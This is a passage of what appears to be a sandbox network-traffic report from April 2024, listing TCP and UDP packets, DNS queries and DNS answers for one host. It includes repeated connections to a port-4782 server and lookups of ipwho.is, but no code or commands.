Apr 23, 2024 23:02:26.117496014 CEST	443	49774	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:28.029427052 CEST	49780	443	192.168.2.5	63.140.39.35
Apr 23, 2024 23:02:28.029475927 CEST	443	49780	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:28.029542923 CEST	49780	443	192.168.2.5	63.140.39.35
Apr 23, 2024 23:02:28.029954910 CEST	49780	443	192.168.2.5	63.140.39.35
Apr 23, 2024 23:02:28.029972076 CEST	443	49780	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:28.278002024 CEST	443	49780	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:28.278268099 CEST	49780	443	192.168.2.5	63.140.39.35
Apr 23, 2024 23:02:28.278294086 CEST	443	49780	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:28.278753996 CEST	443	49780	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:28.279078960 CEST	49780	443	192.168.2.5	63.140.39.35
Apr 23, 2024 23:02:28.279161930 CEST	443	49780	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:28.279222965 CEST	49780	443	192.168.2.5	63.140.39.35
Apr 23, 2024 23:02:28.279242992 CEST	49780	443	192.168.2.5	63.140.39.35
Apr 23, 2024 23:02:28.279256105 CEST	443	49780	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:28.537415028 CEST	443	49780	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:28.538007021 CEST	443	49780	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:28.538101912 CEST	49780	443	192.168.2.5	63.140.39.35
Apr 23, 2024 23:02:28.564516068 CEST	49780	443	192.168.2.5	63.140.39.35
Apr 23, 2024 23:02:28.564544916 CEST	443	49780	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:28.720457077 CEST	49784	443	192.168.2.5	63.140.39.82
Apr 23, 2024 23:02:28.720483065 CEST	443	49784	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:28.720859051 CEST	49784	443	192.168.2.5	63.140.39.82
Apr 23, 2024 23:02:28.721151114 CEST	49784	443	192.168.2.5	63.140.39.82
Apr 23, 2024 23:02:28.721167088 CEST	443	49784	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:28.964443922 CEST	443	49784	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:28.968699932 CEST	49784	443	192.168.2.5	63.140.39.82
Apr 23, 2024 23:02:28.968714952 CEST	443	49784	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:28.969182968 CEST	443	49784	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:28.970377922 CEST	49784	443	192.168.2.5	63.140.39.82
Apr 23, 2024 23:02:28.970453978 CEST	443	49784	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:28.970562935 CEST	49784	443	192.168.2.5	63.140.39.82
Apr 23, 2024 23:02:29.012123108 CEST	443	49784	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:29.136567116 CEST	49784	443	192.168.2.5	63.140.39.82
Apr 23, 2024 23:02:29.247735023 CEST	443	49784	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:29.248249054 CEST	443	49784	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:29.248317003 CEST	49784	443	192.168.2.5	63.140.39.82
Apr 23, 2024 23:02:29.248814106 CEST	49784	443	192.168.2.5	63.140.39.82
Apr 23, 2024 23:02:29.248825073 CEST	443	49784	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:29.951900959 CEST	49703	443	192.168.2.5	23.1.237.91
Apr 23, 2024 23:02:30.104455948 CEST	443	49703	23.1.237.91	192.168.2.5
Apr 23, 2024 23:02:31.488585949 CEST	443	49715	64.233.185.147	192.168.2.5
Apr 23, 2024 23:02:31.488728046 CEST	443	49715	64.233.185.147	192.168.2.5
Apr 23, 2024 23:02:31.488796949 CEST	49715	443	192.168.2.5	64.233.185.147
Apr 23, 2024 23:02:32.247380972 CEST	49715	443	192.168.2.5	64.233.185.147
Apr 23, 2024 23:02:32.247441053 CEST	443	49715	64.233.185.147	192.168.2.5
Apr 23, 2024 23:02:37.914587021 CEST	49803	4782	192.168.2.5	185.196.10.233
Apr 23, 2024 23:02:38.125693083 CEST	4782	49803	185.196.10.233	192.168.2.5
Apr 23, 2024 23:02:38.125797987 CEST	49803	4782	192.168.2.5	185.196.10.233
Apr 23, 2024 23:02:38.138312101 CEST	49803	4782	192.168.2.5	185.196.10.233
Apr 23, 2024 23:02:38.369455099 CEST	4782	49803	185.196.10.233	192.168.2.5
Apr 23, 2024 23:02:38.369468927 CEST	4782	49803	185.196.10.233	192.168.2.5
Apr 23, 2024 23:02:38.369539022 CEST	49803	4782	192.168.2.5	185.196.10.233
Apr 23, 2024 23:02:38.375524998 CEST	49803	4782	192.168.2.5	185.196.10.233
Apr 23, 2024 23:02:38.589952946 CEST	4782	49803	185.196.10.233	192.168.2.5
Apr 23, 2024 23:02:38.743484020 CEST	49803	4782	192.168.2.5	185.196.10.233
Apr 23, 2024 23:02:38.870115042 CEST	49804	443	192.168.2.5	15.204.213.5
Apr 23, 2024 23:02:38.870179892 CEST	443	49804	15.204.213.5	192.168.2.5
Apr 23, 2024 23:02:38.870270967 CEST	49804	443	192.168.2.5	15.204.213.5
Apr 23, 2024 23:02:38.870719910 CEST	49804	443	192.168.2.5	15.204.213.5
Apr 23, 2024 23:02:38.870739937 CEST	443	49804	15.204.213.5	192.168.2.5
Apr 23, 2024 23:02:39.270601034 CEST	443	49804	15.204.213.5	192.168.2.5
Apr 23, 2024 23:02:39.270750999 CEST	49804	443	192.168.2.5	15.204.213.5
Apr 23, 2024 23:02:39.272927046 CEST	49804	443	192.168.2.5	15.204.213.5
Apr 23, 2024 23:02:39.272958994 CEST	443	49804	15.204.213.5	192.168.2.5
Apr 23, 2024 23:02:39.273386955 CEST	443	49804	15.204.213.5	192.168.2.5
Apr 23, 2024 23:02:39.279205084 CEST	49804	443	192.168.2.5	15.204.213.5
Apr 23, 2024 23:02:39.320161104 CEST	443	49804	15.204.213.5	192.168.2.5
Apr 23, 2024 23:02:39.404155970 CEST	443	49804	15.204.213.5	192.168.2.5
Apr 23, 2024 23:02:39.404367924 CEST	443	49804	15.204.213.5	192.168.2.5
Apr 23, 2024 23:02:39.404489994 CEST	49804	443	192.168.2.5	15.204.213.5
Apr 23, 2024 23:02:39.527558088 CEST	49804	443	192.168.2.5	15.204.213.5
Apr 23, 2024 23:02:39.738332033 CEST	49803	4782	192.168.2.5	185.196.10.233
Apr 23, 2024 23:02:40.002796888 CEST	4782	49803	185.196.10.233	192.168.2.5
Apr 23, 2024 23:02:40.005686998 CEST	49803	4782	192.168.2.5	185.196.10.233
Apr 23, 2024 23:02:40.219611883 CEST	4782	49803	185.196.10.233	192.168.2.5
Apr 23, 2024 23:02:40.392396927 CEST	49803	4782	192.168.2.5	185.196.10.233
Apr 23, 2024 23:02:40.603465080 CEST	4782	49803	185.196.10.233	192.168.2.5
Apr 23, 2024 23:02:40.654642105 CEST	49803	4782	192.168.2.5	185.196.10.233
Apr 23, 2024 23:03:00.967231989 CEST	49824	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:03:00.967276096 CEST	443	49824	13.85.23.86	192.168.2.5
Apr 23, 2024 23:03:00.967351913 CEST	49824	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:03:00.968076944 CEST	49824	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:03:00.968094110 CEST	443	49824	13.85.23.86	192.168.2.5
Apr 23, 2024 23:03:01.385704041 CEST	443	49824	13.85.23.86	192.168.2.5
Apr 23, 2024 23:03:01.385802984 CEST	49824	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:03:01.388199091 CEST	49824	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:03:01.388210058 CEST	443	49824	13.85.23.86	192.168.2.5
Apr 23, 2024 23:03:01.388751984 CEST	443	49824	13.85.23.86	192.168.2.5
Apr 23, 2024 23:03:01.401110888 CEST	49824	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:03:01.444160938 CEST	443	49824	13.85.23.86	192.168.2.5
Apr 23, 2024 23:03:01.779505014 CEST	443	49824	13.85.23.86	192.168.2.5
Apr 23, 2024 23:03:01.779566050 CEST	443	49824	13.85.23.86	192.168.2.5
Apr 23, 2024 23:03:01.779608011 CEST	443	49824	13.85.23.86	192.168.2.5
Apr 23, 2024 23:03:01.779706001 CEST	49824	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:03:01.779722929 CEST	443	49824	13.85.23.86	192.168.2.5
Apr 23, 2024 23:03:01.779766083 CEST	443	49824	13.85.23.86	192.168.2.5
Apr 23, 2024 23:03:01.779769897 CEST	49824	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:03:01.779798031 CEST	443	49824	13.85.23.86	192.168.2.5
Apr 23, 2024 23:03:01.779822111 CEST	49824	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:03:01.779830933 CEST	443	49824	13.85.23.86	192.168.2.5
Apr 23, 2024 23:03:01.779843092 CEST	49824	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:03:01.779856920 CEST	443	49824	13.85.23.86	192.168.2.5
Apr 23, 2024 23:03:01.779897928 CEST	49824	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:03:01.779934883 CEST	443	49824	13.85.23.86	192.168.2.5
Apr 23, 2024 23:03:01.780052900 CEST	443	49824	13.85.23.86	192.168.2.5
Apr 23, 2024 23:03:01.780107021 CEST	49824	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:03:01.784073114 CEST	49824	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:03:01.784085989 CEST	443	49824	13.85.23.86	192.168.2.5
Apr 23, 2024 23:03:01.784116030 CEST	49824	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:03:01.784121037 CEST	443	49824	13.85.23.86	192.168.2.5
Apr 23, 2024 23:03:05.619478941 CEST	49803	4782	192.168.2.5	185.196.10.233
Apr 23, 2024 23:03:05.830338001 CEST	4782	49803	185.196.10.233	192.168.2.5
Apr 23, 2024 23:03:05.877871037 CEST	4782	49803	185.196.10.233	192.168.2.5
Apr 23, 2024 23:03:05.878000975 CEST	49803	4782	192.168.2.5	185.196.10.233
Apr 23, 2024 23:03:08.447391033 CEST	49735	443	192.168.2.5	34.195.193.219
Apr 23, 2024 23:03:08.447422981 CEST	443	49735	34.195.193.219	192.168.2.5
Apr 23, 2024 23:03:21.184048891 CEST	49828	443	192.168.2.5	64.233.185.147
Apr 23, 2024 23:03:21.184078932 CEST	443	49828	64.233.185.147	192.168.2.5
Apr 23, 2024 23:03:21.184165955 CEST	49828	443	192.168.2.5	64.233.185.147
Apr 23, 2024 23:03:21.184412003 CEST	49828	443	192.168.2.5	64.233.185.147
Apr 23, 2024 23:03:21.184422016 CEST	443	49828	64.233.185.147	192.168.2.5
Apr 23, 2024 23:03:21.402019024 CEST	443	49828	64.233.185.147	192.168.2.5
Apr 23, 2024 23:03:21.402318001 CEST	49828	443	192.168.2.5	64.233.185.147
Apr 23, 2024 23:03:21.402329922 CEST	443	49828	64.233.185.147	192.168.2.5
Apr 23, 2024 23:03:21.402600050 CEST	443	49828	64.233.185.147	192.168.2.5
Apr 23, 2024 23:03:21.402985096 CEST	49828	443	192.168.2.5	64.233.185.147
Apr 23, 2024 23:03:21.403028965 CEST	443	49828	64.233.185.147	192.168.2.5
Apr 23, 2024 23:03:21.447928905 CEST	49828	443	192.168.2.5	64.233.185.147
Apr 23, 2024 23:03:23.270664930 CEST	443	49735	34.195.193.219	192.168.2.5
Apr 23, 2024 23:03:23.270836115 CEST	443	49735	34.195.193.219	192.168.2.5
Apr 23, 2024 23:03:23.271008968 CEST	49735	443	192.168.2.5	34.195.193.219
Apr 23, 2024 23:03:24.246535063 CEST	49735	443	192.168.2.5	34.195.193.219
Apr 23, 2024 23:03:24.246575117 CEST	443	49735	34.195.193.219	192.168.2.5
Apr 23, 2024 23:03:30.838468075 CEST	49803	4782	192.168.2.5	185.196.10.233
Apr 23, 2024 23:03:31.049190998 CEST	4782	49803	185.196.10.233	192.168.2.5
Apr 23, 2024 23:03:31.096529007 CEST	4782	49803	185.196.10.233	192.168.2.5
Apr 23, 2024 23:03:31.096601963 CEST	49803	4782	192.168.2.5	185.196.10.233
Apr 23, 2024 23:03:31.410562992 CEST	443	49828	64.233.185.147	192.168.2.5
Apr 23, 2024 23:03:31.410614014 CEST	443	49828	64.233.185.147	192.168.2.5
Apr 23, 2024 23:03:31.410687923 CEST	49828	443	192.168.2.5	64.233.185.147
Apr 23, 2024 23:03:32.245918989 CEST	49828	443	192.168.2.5	64.233.185.147
Apr 23, 2024 23:03:32.245950937 CEST	443	49828	64.233.185.147	192.168.2.5
Apr 23, 2024 23:03:56.057033062 CEST	49803	4782	192.168.2.5	185.196.10.233
Apr 23, 2024 23:03:56.267891884 CEST	4782	49803	185.196.10.233	192.168.2.5
Apr 23, 2024 23:03:56.309487104 CEST	4782	49803	185.196.10.233	192.168.2.5
Apr 23, 2024 23:03:56.309540987 CEST	49803	4782	192.168.2.5	185.196.10.233

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 23, 2024 23:02:17.479551077 CEST	53	61971	1.1.1.1	192.168.2.5
Apr 23, 2024 23:02:17.526650906 CEST	53	64617	1.1.1.1	192.168.2.5
Apr 23, 2024 23:02:18.747055054 CEST	53	62810	1.1.1.1	192.168.2.5
Apr 23, 2024 23:02:21.159584045 CEST	49983	53	192.168.2.5	1.1.1.1
Apr 23, 2024 23:02:21.159748077 CEST	57413	53	192.168.2.5	1.1.1.1
Apr 23, 2024 23:02:21.266062975 CEST	53	57413	1.1.1.1	192.168.2.5
Apr 23, 2024 23:02:21.266158104 CEST	53	49983	1.1.1.1	192.168.2.5
Apr 23, 2024 23:02:21.574692011 CEST	62365	53	192.168.2.5	1.1.1.1
Apr 23, 2024 23:02:21.574872971 CEST	49486	53	192.168.2.5	1.1.1.1
Apr 23, 2024 23:02:22.914030075 CEST	61105	53	192.168.2.5	1.1.1.1
Apr 23, 2024 23:02:22.914477110 CEST	55731	53	192.168.2.5	1.1.1.1
Apr 23, 2024 23:02:22.916699886 CEST	62981	53	192.168.2.5	1.1.1.1
Apr 23, 2024 23:02:22.916835070 CEST	62311	53	192.168.2.5	1.1.1.1
Apr 23, 2024 23:02:23.021970034 CEST	53	61105	1.1.1.1	192.168.2.5
Apr 23, 2024 23:02:23.024065018 CEST	53	62981	1.1.1.1	192.168.2.5
Apr 23, 2024 23:02:23.024561882 CEST	53	62311	1.1.1.1	192.168.2.5
Apr 23, 2024 23:02:23.024769068 CEST	53	55731	1.1.1.1	192.168.2.5
Apr 23, 2024 23:02:24.277606964 CEST	53	56521	1.1.1.1	192.168.2.5
Apr 23, 2024 23:02:24.935931921 CEST	57450	53	192.168.2.5	1.1.1.1
Apr 23, 2024 23:02:24.936454058 CEST	59393	53	192.168.2.5	1.1.1.1
Apr 23, 2024 23:02:37.336606026 CEST	53	54291	1.1.1.1	192.168.2.5
Apr 23, 2024 23:02:38.742547035 CEST	53168	53	192.168.2.5	1.1.1.1
Apr 23, 2024 23:02:38.863358974 CEST	53	53168	1.1.1.1	192.168.2.5
Apr 23, 2024 23:02:52.341321945 CEST	58564	53	192.168.2.5	1.1.1.1
Apr 23, 2024 23:02:52.448920965 CEST	53	58564	1.1.1.1	192.168.2.5
Apr 23, 2024 23:02:56.134454012 CEST	53	57647	1.1.1.1	192.168.2.5
Apr 23, 2024 23:03:11.150453091 CEST	57453	53	192.168.2.5	1.1.1.1
Apr 23, 2024 23:03:11.257581949 CEST	53	57453	1.1.1.1	192.168.2.5
Apr 23, 2024 23:03:16.775302887 CEST	53	52534	1.1.1.1	192.168.2.5
Apr 23, 2024 23:03:19.181143999 CEST	53	64324	1.1.1.1	192.168.2.5
Apr 23, 2024 23:03:25.428848028 CEST	57024	53	192.168.2.5	1.1.1.1
Apr 23, 2024 23:03:25.429020882 CEST	58333	53	192.168.2.5	1.1.1.1
Apr 23, 2024 23:03:29.400562048 CEST	50706	53	192.168.2.5	1.1.1.1
Apr 23, 2024 23:03:29.507601023 CEST	53	50706	1.1.1.1	192.168.2.5
Apr 23, 2024 23:03:44.165474892 CEST	53	53802	1.1.1.1	192.168.2.5
Apr 23, 2024 23:03:59.135850906 CEST	56193	53	192.168.2.5	1.1.1.1
Apr 23, 2024 23:03:59.243232012 CEST	53	56193	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 23, 2024 23:02:21.159584045 CEST	192.168.2.5	1.1.1.1	0xda2f	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:21.159748077 CEST	192.168.2.5	1.1.1.1	0x2cdb	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 23, 2024 23:02:21.574692011 CEST	192.168.2.5	1.1.1.1	0x70ff	Standard query (0)	js.monitor.azure.com	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:21.574872971 CEST	192.168.2.5	1.1.1.1	0xa57a	Standard query (0)	js.monitor.azure.com	65	IN (0x0001)	false
Apr 23, 2024 23:02:22.914030075 CEST	192.168.2.5	1.1.1.1	0xb5de	Standard query (0)	mscom.demdex.net	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:22.914477110 CEST	192.168.2.5	1.1.1.1	0xfdee	Standard query (0)	mscom.demdex.net	65	IN (0x0001)	false
Apr 23, 2024 23:02:22.916699886 CEST	192.168.2.5	1.1.1.1	0x676b	Standard query (0)	microsoftmscompoc.tt.omtrdc.net	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:22.916835070 CEST	192.168.2.5	1.1.1.1	0x64e8	Standard query (0)	microsoftmscompoc.tt.omtrdc.net	65	IN (0x0001)	false
Apr 23, 2024 23:02:24.935931921 CEST	192.168.2.5	1.1.1.1	0x1454	Standard query (0)	mdec.nelreports.net	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:24.936454058 CEST	192.168.2.5	1.1.1.1	0xfcd2	Standard query (0)	mdec.nelreports.net	65	IN (0x0001)	false
Apr 23, 2024 23:02:38.742547035 CEST	192.168.2.5	1.1.1.1	0xbdce	Standard query (0)	ipwho.is	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:52.341321945 CEST	192.168.2.5	1.1.1.1	0x1228	Standard query (0)	ipwho.is	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:03:11.150453091 CEST	192.168.2.5	1.1.1.1	0x77f	Standard query (0)	ipwho.is	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:03:25.428848028 CEST	192.168.2.5	1.1.1.1	0x3ff4	Standard query (0)	mdec.nelreports.net	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:03:25.429020882 CEST	192.168.2.5	1.1.1.1	0xf610	Standard query (0)	mdec.nelreports.net	65	IN (0x0001)	false
Apr 23, 2024 23:03:29.400562048 CEST	192.168.2.5	1.1.1.1	0x78cc	Standard query (0)	ipwho.is	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:03:59.135850906 CEST	192.168.2.5	1.1.1.1	0x5eee	Standard query (0)	ipwho.is	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 23, 2024 23:02:21.266062975 CEST	1.1.1.1	192.168.2.5	0x2cdb	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 23, 2024 23:02:21.266158104 CEST	1.1.1.1	192.168.2.5	0xda2f	No error (0)	www.google.com		64.233.185.147	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:21.266158104 CEST	1.1.1.1	192.168.2.5	0xda2f	No error (0)	www.google.com		64.233.185.106	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:21.266158104 CEST	1.1.1.1	192.168.2.5	0xda2f	No error (0)	www.google.com		64.233.185.103	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:21.266158104 CEST	1.1.1.1	192.168.2.5	0xda2f	No error (0)	www.google.com		64.233.185.105	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:21.266158104 CEST	1.1.1.1	192.168.2.5	0xda2f	No error (0)	www.google.com		64.233.185.99	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:21.266158104 CEST	1.1.1.1	192.168.2.5	0xda2f	No error (0)	www.google.com		64.233.185.104	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:21.681206942 CEST	1.1.1.1	192.168.2.5	0x70ff	No error (0)	js.monitor.azure.com	aijscdn2.azureedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 23:02:21.681206942 CEST	1.1.1.1	192.168.2.5	0x70ff	No error (0)	shed.dual-low.part-0013.t-0009.t-msedge.net	part-0013.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 23:02:21.681206942 CEST	1.1.1.1	192.168.2.5	0x70ff	No error (0)	part-0013.t-0009.t-msedge.net		13.107.213.41	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:21.681206942 CEST	1.1.1.1	192.168.2.5	0x70ff	No error (0)	part-0013.t-0009.t-msedge.net		13.107.246.41	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:21.681386948 CEST	1.1.1.1	192.168.2.5	0x924f	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 23:02:21.681386948 CEST	1.1.1.1	192.168.2.5	0x924f	No error (0)	shed.dual-low.part-0013.t-0009.t-msedge.net	part-0013.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 23:02:21.681386948 CEST	1.1.1.1	192.168.2.5	0x924f	No error (0)	part-0013.t-0009.t-msedge.net		13.107.213.41	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:21.681386948 CEST	1.1.1.1	192.168.2.5	0x924f	No error (0)	part-0013.t-0009.t-msedge.net		13.107.246.41	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:21.681690931 CEST	1.1.1.1	192.168.2.5	0xba75	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 23:02:21.681971073 CEST	1.1.1.1	192.168.2.5	0xa57a	No error (0)	js.monitor.azure.com	aijscdn2.azureedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 23:02:23.021970034 CEST	1.1.1.1	192.168.2.5	0xb5de	No error (0)	mscom.demdex.net	gslb-2.demdex.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 23:02:23.021970034 CEST	1.1.1.1	192.168.2.5	0xb5de	No error (0)	gslb-2.demdex.net	edge-va6.demdex.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 23:02:23.021970034 CEST	1.1.1.1	192.168.2.5	0xb5de	No error (0)	edge-va6.demdex.net	dcs-public-edge-va6-158015560.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 23:02:23.021970034 CEST	1.1.1.1	192.168.2.5	0xb5de	No error (0)	dcs-public-edge-va6-158015560.us-east-1.elb.amazonaws.com		34.195.193.219	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.021970034 CEST	1.1.1.1	192.168.2.5	0xb5de	No error (0)	dcs-public-edge-va6-158015560.us-east-1.elb.amazonaws.com		54.147.4.223	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.021970034 CEST	1.1.1.1	192.168.2.5	0xb5de	No error (0)	dcs-public-edge-va6-158015560.us-east-1.elb.amazonaws.com		52.205.1.199	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.021970034 CEST	1.1.1.1	192.168.2.5	0xb5de	No error (0)	dcs-public-edge-va6-158015560.us-east-1.elb.amazonaws.com		3.219.37.82	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.021970034 CEST	1.1.1.1	192.168.2.5	0xb5de	No error (0)	dcs-public-edge-va6-158015560.us-east-1.elb.amazonaws.com		44.198.199.61	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.021970034 CEST	1.1.1.1	192.168.2.5	0xb5de	No error (0)	dcs-public-edge-va6-158015560.us-east-1.elb.amazonaws.com		3.209.244.20	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.021970034 CEST	1.1.1.1	192.168.2.5	0xb5de	No error (0)	dcs-public-edge-va6-158015560.us-east-1.elb.amazonaws.com		3.215.128.155	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.021970034 CEST	1.1.1.1	192.168.2.5	0xb5de	No error (0)	dcs-public-edge-va6-158015560.us-east-1.elb.amazonaws.com		3.213.108.239	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.023344994 CEST	1.1.1.1	192.168.2.5	0x2bde	No error (0)	microsoftmscompoc.tt.omtrdc.net	adobetarget.data.adobedc.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 23:02:23.024065018 CEST	1.1.1.1	192.168.2.5	0x676b	No error (0)	microsoftmscompoc.tt.omtrdc.net	adobetarget.data.adobedc.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 23:02:23.024065018 CEST	1.1.1.1	192.168.2.5	0x676b	No error (0)	adobetarget.data.adobedc.net		63.140.39.82	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.024065018 CEST	1.1.1.1	192.168.2.5	0x676b	No error (0)	adobetarget.data.adobedc.net		63.140.39.130	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.024065018 CEST	1.1.1.1	192.168.2.5	0x676b	No error (0)	adobetarget.data.adobedc.net		63.140.38.217	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.024065018 CEST	1.1.1.1	192.168.2.5	0x676b	No error (0)	adobetarget.data.adobedc.net		63.140.39.150	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.024065018 CEST	1.1.1.1	192.168.2.5	0x676b	No error (0)	adobetarget.data.adobedc.net		63.140.38.112	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.024065018 CEST	1.1.1.1	192.168.2.5	0x676b	No error (0)	adobetarget.data.adobedc.net		63.140.38.91	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.024065018 CEST	1.1.1.1	192.168.2.5	0x676b	No error (0)	adobetarget.data.adobedc.net		63.140.39.72	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.024065018 CEST	1.1.1.1	192.168.2.5	0x676b	No error (0)	adobetarget.data.adobedc.net		63.140.39.248	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.024065018 CEST	1.1.1.1	192.168.2.5	0x676b	No error (0)	adobetarget.data.adobedc.net		63.140.39.93	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.024065018 CEST	1.1.1.1	192.168.2.5	0x676b	No error (0)	adobetarget.data.adobedc.net		63.140.39.224	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.024561882 CEST	1.1.1.1	192.168.2.5	0x64e8	No error (0)	microsoftmscompoc.tt.omtrdc.net	adobetarget.data.adobedc.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 23:02:23.024769068 CEST	1.1.1.1	192.168.2.5	0xfdee	No error (0)	mscom.demdex.net	gslb-2.demdex.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 23:02:23.024769068 CEST	1.1.1.1	192.168.2.5	0xfdee	No error (0)	gslb-2.demdex.net	edge-va6.demdex.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 23:02:23.024769068 CEST	1.1.1.1	192.168.2.5	0xfdee	No error (0)	edge-va6.demdex.net	dcs-public-edge-va6-158015560.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 23:02:23.050591946 CEST	1.1.1.1	192.168.2.5	0x7385	No error (0)	microsoftmscompoc.tt.omtrdc.net	adobetarget.data.adobedc.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 23:02:23.050591946 CEST	1.1.1.1	192.168.2.5	0x7385	No error (0)	adobetarget.data.adobedc.net		63.140.39.35	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.050591946 CEST	1.1.1.1	192.168.2.5	0x7385	No error (0)	adobetarget.data.adobedc.net		63.140.39.22	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.050591946 CEST	1.1.1.1	192.168.2.5	0x7385	No error (0)	adobetarget.data.adobedc.net		63.140.38.55	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.050591946 CEST	1.1.1.1	192.168.2.5	0x7385	No error (0)	adobetarget.data.adobedc.net		63.140.39.15	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.050591946 CEST	1.1.1.1	192.168.2.5	0x7385	No error (0)	adobetarget.data.adobedc.net		63.140.38.138	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.050591946 CEST	1.1.1.1	192.168.2.5	0x7385	No error (0)	adobetarget.data.adobedc.net		63.140.39.117	A (IP address)	IN (0x0001)	false
Apr 23, 2024 23:02:23.050591946 CEST	1.1.1.1	192.168.2.5	0x7385	No error (0)	adobetarget.data.adobedc.net		63.140.38.189	A (IP address)	IN (0x0001)	false
